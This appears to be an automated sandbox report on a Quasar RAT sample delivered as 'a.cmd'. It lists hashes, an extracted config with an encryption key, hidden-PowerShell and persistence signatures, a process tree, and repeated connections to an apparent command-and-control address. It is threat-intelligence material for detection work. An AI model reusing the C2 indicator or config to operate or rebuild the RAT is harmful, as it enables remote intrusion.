Analysis

  • max time kernel
    127s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    28/01/2025, 00:06 UTC

General

  • Target

    a.cmd

  • Size

    4.2MB

  • MD5

    8e53db2a2b188768e4c23344be407467

  • SHA1

    99dd0a15c342904542a6f2f0b9eed3a8c68aff68

  • SHA256

    bfcdaed93c4c3605be7e800daac4299c4aa0df0218798cb64c2e2f01027989b2

  • SHA512

    d7533b52cd188b2f62ea35c0c7774fb5e5d1c824ac96221d8d32a8a73a4f4e29f73ef5cfb968e76def16c2c32f4a35ea6422e3945b9b2d6eb21809ec18a389b6

  • SSDEEP

    49152:bXMw/hbcpR1DHQJLN+Z/8AEUCm5feXp8dv6Hkn1uX+OiqK67KFly6TteW5SEVAAl:G

Malware Config

Extracted

Family

quasar

Mutex

"&Rj@���:@b;���

Attributes
  • encryption_key

    2F93492D384FEB71103635232F1BD56A2FEFBDE7

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3100
    • C:\Windows\system32\conhost.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3924
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:3880

Network

  • DNS 8.8.8.8.in-addr.arpa (remote address 8.8.8.8:53): request IN PTR; response IN PTR dns.google
  • DNS 58.55.71.13.in-addr.arpa (remote address 8.8.8.8:53): request IN PTR; response (empty)
  • DNS 172.214.232.199.in-addr.arpa (remote address 8.8.8.8:53): request IN PTR; response (empty)
  • DNS 2.159.190.20.in-addr.arpa (remote address 8.8.8.8:53): request IN PTR; response (empty)
  • DNS 5.114.82.104.in-addr.arpa (remote address 8.8.8.8:53): request IN PTR; response IN PTR a104-82-114-5.deploy.static.akamaitechnologies.com
  • DNS 97.17.167.52.in-addr.arpa (remote address 8.8.8.8:53): request IN PTR; response (empty)
  • DNS 241.42.69.40.in-addr.arpa (remote address 8.8.8.8:53): request IN PTR; response (empty)
  • DNS 200.163.202.172.in-addr.arpa (remote address 8.8.8.8:53): request IN PTR; response (empty)
  • DNS 86.49.80.91.in-addr.arpa (remote address 8.8.8.8:53): request IN PTR; response (empty)
  • DNS 172.210.232.199.in-addr.arpa (remote address 8.8.8.8:53): request IN PTR; response (empty)
  • 193.124.205.56:350  powershell.exe  260 B  5
  • 193.124.205.56:350  powershell.exe  260 B  5
  • 193.124.205.56:350  powershell.exe  260 B  5
  • 193.124.205.56:350  powershell.exe  260 B  5
  • 193.124.205.56:350  powershell.exe  260 B  5
  • 193.124.205.56:350  powershell.exe  260 B  5
  • 8.8.8.8:53  8.8.8.8.in-addr.arpa  dns  66 B  90 B  1  1
  • 8.8.8.8:53  58.55.71.13.in-addr.arpa  dns  70 B  144 B  1  1
  • 8.8.8.8:53  172.214.232.199.in-addr.arpa  dns  74 B  128 B  1  1
  • 8.8.8.8:53  2.159.190.20.in-addr.arpa  dns  71 B  157 B  1  1
  • 8.8.8.8:53  5.114.82.104.in-addr.arpa  dns  71 B  135 B  1  1
  • 8.8.8.8:53  97.17.167.52.in-addr.arpa  dns  71 B  145 B  1  1
  • 8.8.8.8:53  241.42.69.40.in-addr.arpa  dns  71 B  145 B  1  1
  • 8.8.8.8:53  200.163.202.172.in-addr.arpa  dns  74 B  160 B  1  1
  • 8.8.8.8:53  86.49.80.91.in-addr.arpa  dns  70 B  145 B  1  1
  • 8.8.8.8:53  172.210.232.199.in-addr.arpa  dns  74 B  128 B  1  1

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zon4tc0x.ehy.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3880-16-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp (Filesize: 10.8MB)
  • memory/3880-18-0x000001D3A8570000-0x000001D3A858E000-memory.dmp (Filesize: 120KB)
  • memory/3880-11-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp (Filesize: 10.8MB)
  • memory/3880-12-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp (Filesize: 10.8MB)
  • memory/3880-13-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp (Filesize: 10.8MB)
  • memory/3880-14-0x000001D38F820000-0x000001D38F828000-memory.dmp (Filesize: 32KB)
  • memory/3880-15-0x000001D3A8330000-0x000001D3A833A000-memory.dmp (Filesize: 40KB)
  • memory/3880-0-0x00007FFA5E943000-0x00007FFA5E945000-memory.dmp (Filesize: 8KB)
  • memory/3880-10-0x000001D38F7D0000-0x000001D38F7F2000-memory.dmp (Filesize: 136KB)
  • memory/3880-19-0x000001D3A87F0000-0x000001D3A8B1A000-memory.dmp (Filesize: 3.2MB)
  • memory/3880-17-0x000001D3A8630000-0x000001D3A86A6000-memory.dmp (Filesize: 472KB)
  • memory/3880-20-0x000001D3A92D0000-0x000001D3A9320000-memory.dmp (Filesize: 320KB)
  • memory/3880-21-0x000001D3A93E0000-0x000001D3A9492000-memory.dmp (Filesize: 712KB)
  • memory/3880-22-0x000001D3A9670000-0x000001D3A9832000-memory.dmp (Filesize: 1.8MB)
  • memory/3880-23-0x00007FFA5E943000-0x00007FFA5E945000-memory.dmp (Filesize: 8KB)
  • memory/3880-24-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp (Filesize: 10.8MB)
  • memory/3880-25-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp (Filesize: 10.8MB)
